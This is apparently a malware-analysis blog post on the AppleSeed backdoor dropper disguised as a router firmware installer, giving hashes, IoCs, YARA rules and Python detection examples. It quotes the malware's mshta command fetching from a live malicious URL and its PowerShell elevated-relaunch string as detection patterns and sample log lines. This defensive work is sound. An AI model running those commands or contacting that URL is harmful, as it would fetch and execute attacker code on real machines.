Overview of AppleSeed Dropper
This blog post briefly covers some additional details of the AppleSeed backdoor originally documented by AhnLab's ASEC team.
As the ASEC team did a great job detailing the initial access methods in this recent attack, we will skip ahead and dive right into the characteristics and analysis of the malware itself.
Malware Analysis
MD5: 851e33373114fef45d0fe28c6934fa73
SHA256: e0ea745b9d6fe7c222a0ee4962905f9cea3754e7b587274ec7ccef59b3825d9f
File name: firmware upgrade installer.exe
File type: Win PE
Size: 408 KB
As the file name suggests, the executable is disguised as a router firmware upgrade program: it shows a pop-up window asking the user to confirm the start of the supposed upgrade and also opens iptime.com in the victim's web browser (Figure 1).
While the victim may be under the assumption that an upgrade is in progress, the backdoor is installing itself and creating multiple files in the background.
Of note, the backdoor deleted files as soon as their purpose was served, so unfortunately some files were not able to be retrieved. Digging in …
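The behaviour described above (a dropper writing files under ProgramData, launching mshta.exe against the update URL, relaunching itself through PowerShell with -verb runas, and deleting its helpers as soon as they are used) is all visible in host telemetry. The following is an added triage example, not the author's tooling: it runs a few simple rules over a constructed, Sysmon-like log written as "timestamp | key=value | key=value" lines. The Sysmon event IDs (1 ProcessCreate, 11 FileCreate, 23/26 FileDelete) are real; the log format, the 60-second "short-lived file" window, and every path other than the ProgramData\Firmware directory, AutoUpdate.dll and the mshta URL from this post are assumptions made for the example.

```python
"""Host-telemetry triage for the dropper behaviour described in the post.
Added example, not the author's tooling. Input is a constructed Sysmon-like
log in a simple `timestamp | key=value | key=value` form; field names and
event IDs follow Sysmon (1 ProcessCreate, 11 FileCreate, 23/26 FileDelete)."""
import re
from datetime import datetime, timedelta

# Executable/script extensions whose creation under ProgramData merits a look
EXEC_EXT = (".exe", ".dll", ".ps1", ".vbs", ".js", ".hta", ".bat", ".cmd", ".scr")
SUSPICIOUS_ROOT = re.compile(r"^[a-z]:\\programdata\\", re.I)
SHORT_LIVED = timedelta(seconds=60)   # create-then-delete window (assumption)

# Constructed sample log, not real telemetry. Only the ProgramData\Firmware
# directory, AutoUpdate.dll and the mshta URL come from the post; the other
# file names, users and timestamps are made up for the example.
SAMPLE_LOG = r"""
2022-06-01T10:00:00Z | EventID=1 | Image=C:\Users\victim\Downloads\firmware upgrade installer.exe | CommandLine="firmware upgrade installer.exe" | ParentImage=C:\Windows\explorer.exe
2022-06-01T10:00:02Z | EventID=11 | Image=C:\Users\victim\Downloads\firmware upgrade installer.exe | TargetFilename=C:\ProgramData\Firmware\Microsoft\Windows\Defender\AutoUpdate.dll
2022-06-01T10:00:03Z | EventID=11 | Image=C:\Users\victim\Downloads\firmware upgrade installer.exe | TargetFilename=C:\ProgramData\Firmware\stage.tmp
2022-06-01T10:00:04Z | EventID=1 | Image=C:\Windows\System32\mshta.exe | CommandLine=mshta.exe http://leomin.dothome.co.kr/update/?mode=login | ParentImage=C:\Users\victim\Downloads\firmware upgrade installer.exe
2022-06-01T10:00:05Z | EventID=1 | Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | CommandLine=powershell.exe start-process "C:\ProgramData\Firmware\payload.exe" -argumentlist '' -verb runas | ParentImage=C:\Users\victim\Downloads\firmware upgrade installer.exe
2022-06-01T10:00:09Z | EventID=23 | Image=C:\Users\victim\Downloads\firmware upgrade installer.exe | TargetFilename=C:\ProgramData\Firmware\stage.tmp
2022-06-01T10:01:00Z | EventID=1 | Image=C:\Windows\System32\notepad.exe | CommandLine=notepad.exe | ParentImage=C:\Windows\explorer.exe
2022-06-01T10:01:10Z | EventID=11 | Image=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | TargetFilename=C:\Users\victim\Documents\report.docx
"""


def parse_event(line):
    """Split one log line into a dict; the timestamp is parsed, the rest kept as text."""
    ts_text, *fields = [part.strip() for part in line.split(" | ")]
    event = {"ts": datetime.strptime(ts_text, "%Y-%m-%dT%H:%M:%SZ")}
    for field in fields:
        key, _, value = field.partition("=")   # values may themselves contain '='
        event[key] = value
    return event


def detect(lines):
    """Return a list of (alert_name, detail) tuples in log order."""
    alerts = []
    created_at = {}   # lower-cased path -> creation time, for the short-lived-file check
    for line in lines:
        if not line.strip():
            continue
        ev = parse_event(line)
        eid = ev.get("EventID")
        image = ev.get("Image", "").lower()
        if eid == "1":
            cmd = ev.get("CommandLine", "")
            low = cmd.lower()
            # mshta.exe pulling remote content, as in string $b1 of the dropper rule
            if image.endswith("\\mshta.exe") and re.search(r"https?://", low):
                alerts.append(("mshta_remote_url", cmd))
            # PowerShell relaunching a program elevated, as in string $a of the rule
            if image.endswith("\\powershell.exe") and "start-process" in low and "-verb runas" in low:
                alerts.append(("powershell_runas_launch", cmd))
        elif eid == "11":
            target = ev.get("TargetFilename", "")
            created_at[target.lower()] = ev["ts"]
            if SUSPICIOUS_ROOT.match(target) and target.lower().endswith(EXEC_EXT):
                alerts.append(("exec_created_in_suspicious_path", target))
        elif eid in ("23", "26"):
            target = ev.get("TargetFilename", "")
            t0 = created_at.get(target.lower())
            if t0 is not None and ev["ts"] - t0 <= SHORT_LIVED:
                alerts.append(("short_lived_file", target))
    return alerts


if __name__ == "__main__":
    for name, detail in detect(SAMPLE_LOG.splitlines()):
        print(f"{name:32} {detail}")
```

The short-lived-file check is the one that matters most for the clean-up behaviour noted above: a file that is created and deleted within seconds is exactly what will not be available to a forensic examiner later, so capturing it at creation time (or enabling Sysmon's FileDelete archiving) is the only way to recover it.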
IoC
http://\ProgramData\Firmware\Microsoft\Windows\Defender.
http://leomin.dothome.co.kr/update/?mode=login
https://download.ahnlab.com/global/brochure/Analysis%20Report%20of%20Kimsuky%20Group.pdf
https://research.splunk.com/endpoint/executables_or_script_creation_in_suspicious_path/
https://iptime.com
https://asec.ahnlab.com/ko/34883/
e240465ca0c31373dc7f1af2bfc08bda45a45aaf4466c6a15d3f16f1182147ea
851e33373114fef45d0fe28c6934fa73
e0ea745b9d6fe7c222a0ee4962905f9cea3754e7b587274ec7ccef59b3825d9f
rule NK_APT_AppleSeed_Dropper {
    meta:
        description = " - file firmware upgrade installer.exe"
        author = "Michael Rippey"
        reference = "https://asec.ahnlab.com/ko/34883/"
        date = "2022-06-01"
        hash = "e0ea745b9d6fe7c222a0ee4962905f9cea3754e7b587274ec7ccef59b3825d9f"
    strings:
        $a = "powershell.exe start-process \"%s\" -argumentlist '%s' -verb runas" fullword wide
        $b1 = "mshta.exe http://leomin.dothome.co.kr/update/?mode=login" fullword ascii
        $b2 = "USER32.dll" fullword ascii
        $b3 = "KERNEL32.dll" fullword ascii
        $b4 = "kernel32.dll" fullword wide
        $b5 = "mscoree.dll" fullword wide
        $b6 = "https://iptime.com" fullword wide
        $b7 = "broken pipe" fullword ascii
        $b8 = "executable format error" fullword ascii
        $b9 = "host unreachable" fullword ascii
        $b10 = "connection already in progress" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 1000KB and
        1 of ($a*) and 4 of them
}

rule NK_APT_AppleSeed_Backdoor {
    meta:
        description = " - file AutoUpdate.dll"
        author = "Michael Rippey"
        reference = "https://asec.ahnlab.com/ko/34883/"
        date = "2022-06-01"
        hash = "e240465ca0c31373dc7f1af2bfc08bda45a45aaf4466c6a15d3f16f1182147ea"
    strings:
        $a1 = "ADVAPI32.dll" fullword ascii
        $a2 = "KERNEL32.DLL" fullword ascii
        $a3 = "freed.dll" fullword ascii
        $a4 = "outlook" fullword wide
        $a5 = "CryptEncrypt" fullword ascii
        $a6 = "amily not supporte" fullword ascii
        $a7 = "connecyar" fullword ascii
        $a8 = "rerictaj" fullword ascii
        $a9 = "lrgeabik" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 400KB and
        5 of them
}
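To make the rule logic concrete (how `uint16(0) == 0x5a4d` is just the little-endian "MZ" header, how `wide` strings are UTF-16LE, and how the dropper rule's `1 of ($a*) and 4 of them` differs from the backdoor rule's plain `5 of them`), here is an added pure-Python emulation of the two rules above. It is not the author's tooling and not a substitute for running the rules in yara; `fullword` is approximated as "no alphanumeric character of the same width directly before or after the match", and the buffers it scans are constructed test data, not real samples.

```python
"""Pure-Python emulation of the two YARA rules above (added example; not the
author's tooling and not a replacement for the yara binary)."""

KB = 1024   # YARA's KB suffix means 1024 bytes

# String sets transcribed from the rules: (identifier, text, encoding)
DROPPER_STRINGS = [
    ("$a", 'powershell.exe start-process "%s" -argumentlist \'%s\' -verb runas', "wide"),
    ("$b1", "mshta.exe http://leomin.dothome.co.kr/update/?mode=login", "ascii"),
    ("$b2", "USER32.dll", "ascii"),
    ("$b3", "KERNEL32.dll", "ascii"),
    ("$b4", "kernel32.dll", "wide"),
    ("$b5", "mscoree.dll", "wide"),
    ("$b6", "https://iptime.com", "wide"),
    ("$b7", "broken pipe", "ascii"),
    ("$b8", "executable format error", "ascii"),
    ("$b9", "host unreachable", "ascii"),
    ("$b10", "connection already in progress", "ascii"),
]
BACKDOOR_STRINGS = [
    ("$a1", "ADVAPI32.dll", "ascii"),
    ("$a2", "KERNEL32.DLL", "ascii"),
    ("$a3", "freed.dll", "ascii"),
    ("$a4", "outlook", "wide"),
    ("$a5", "CryptEncrypt", "ascii"),
    ("$a6", "amily not supporte", "ascii"),
    ("$a7", "connecyar", "ascii"),
    ("$a8", "rerictaj", "ascii"),
    ("$a9", "lrgeabik", "ascii"),
]


def encode(text, enc):
    """'wide' in YARA means UTF-16LE; 'ascii' is the raw byte string."""
    return text.encode("utf-16-le") if enc == "wide" else text.encode("ascii")


def _is_word_char(chunk, width):
    """Alphanumeric test on one character of the given width (1 = ascii, 2 = wide)."""
    if len(chunk) < width:
        return False
    if width == 2 and chunk[1] != 0:
        return False
    return chunk[0] < 128 and chr(chunk[0]).isalnum()


def fullword_present(data, text, enc):
    """True if `text` occurs with no alphanumeric character of the same width
    directly before or after it (an approximation of YARA's `fullword`)."""
    needle = encode(text, enc)
    width = 2 if enc == "wide" else 1
    start = 0
    while (i := data.find(needle, start)) >= 0:
        before = data[i - width:i] if i >= width else b""
        after = data[i + len(needle):i + len(needle) + width]
        if not _is_word_char(before, width) and not _is_word_char(after, width):
            return True
        start = i + 1
    return False


def evaluate(strings, data, max_size, min_total, required=None):
    """Evaluate a rule of the shape
    `uint16(0) == 0x5a4d and filesize < max_size and [1 of (required) and] min_total of them`
    and return (matched, identifiers_that_hit)."""
    matched = [ident for ident, text, enc in strings if fullword_present(data, text, enc)]
    is_pe = data[:2] == b"MZ"          # uint16(0) == 0x5a4d is 'MZ' read little-endian
    ok = is_pe and len(data) < max_size and len(matched) >= min_total
    if required is not None:           # the dropper rule's `1 of ($a*)`
        ok = ok and required in matched
    return ok, matched


def scan_dropper(data):
    return evaluate(DROPPER_STRINGS, data, 1000 * KB, 4, required="$a")


def scan_backdoor(data):
    return evaluate(BACKDOOR_STRINGS, data, 400 * KB, 5)


def build_sample(strings, present):
    """Constructed test buffer: an 'MZ' header stub followed by the selected
    strings, each NUL-terminated. Test data only, not a real binary."""
    out = [b"MZ" + b"\x00" * 62]
    for ident, text, enc in strings:
        if ident in present:
            out.append(encode(text, enc) + b"\x00\x00")
    return b"".join(out)


if __name__ == "__main__":
    print(scan_dropper(build_sample(DROPPER_STRINGS, {"$a", "$b1", "$b2", "$b3", "$b7"})))
    print(scan_dropper(build_sample(DROPPER_STRINGS, {"$b2", "$b3", "$b7", "$b9"})))
    print(scan_backdoor(build_sample(BACKDOOR_STRINGS, {"$a1", "$a2", "$a3", "$a5", "$a7"})))
```

The second dropper call is the instructive one: four strings hit, which satisfies `4 of them`, but `$a` (the PowerShell relaunch string) is absent, so `1 of ($a*)` fails and the rule does not fire. The generic import names (`USER32.dll`, `KERNEL32.dll`) and C runtime error strings in the `$b` set appear in countless legitimate binaries, which is why the rule pins the match on the one behaviour-specific string.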